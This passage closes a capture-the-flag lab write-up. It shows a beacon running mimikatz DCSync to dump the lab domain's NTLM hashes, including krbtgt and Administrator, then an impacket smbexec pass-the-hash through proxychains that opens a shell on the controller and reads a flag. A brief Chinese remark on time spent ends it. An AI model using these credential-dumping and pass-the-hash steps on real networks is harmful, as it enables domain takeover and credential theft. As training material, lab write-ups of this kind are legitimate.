beacon> shell C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
[*] Tasked beacon to run: C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
[+] host called home, sent: 147 bytes
[+] received output:

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb 29 2020 11:13:10
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
502	krbtgt	3ffd5b58b4a6328659a606c3ea6f9b63	514
1000	DC01$	01acc6e318277dd078a217aa12d33107	532480
1103	WIN2016$	b0c71ada6635da7d6a583249798fa134	16781312
1104	WIN19-CLIENT$	e5c15d685e2e269ce033d632841bfdd4	16781312
1105	Aldrich	3c42fe16daa873e60c5e9d0f966369e4	512
500	Administrator	2c9d81bdcf3ec8b1def10328a7cc2f08	512

mimikatz(commandline) # exit
Bye!

01acc6e318277dd078a217aa12d33107

proxychains4 -f /etc/proxychains4.conf python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

type C:\Users\Administrator\flag\flag03.txt

┌──(root㉿kali)-[/home/kali/tools/impacket-master/examples]
└─# proxychains4 -f /etc/proxychains4.conf python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>type C:\Users\Administrator\flag\flag03.txt
 _________               __    _                  _    
|  _   _  |             [  |  (_)                / |_  
|_/ | | \_|.--.   .---.  | |  __  .---.  _ .--. `| |-' 
    | |   ( (`\] / /'`\] | | [  |/ /__\\[ `.-. | | |   
   _| |_   `'.'. | \__.  | |  | || \__., | | | | | |,  
  |_____| [\__) )'.___.'[___][___]'.__.'[___||__]\__/  


Congratulations! ! !

flag03: flag{9ba08d25-94f3-4920-a557-1ec7b51224e9}

flag{9ba08d25-94f3-4920-a557-1ec7b51224e9}

总结：

这个靶机看wp觉得可以了，但是实际操作起来很多细节很多坑，导致花费了1小时45分钟才解决，我的沙砾！wp写的乱七八糟，因为没时间去整理，因为打完靶机就去关了，因为沙砾（money。仅供自己之后参考八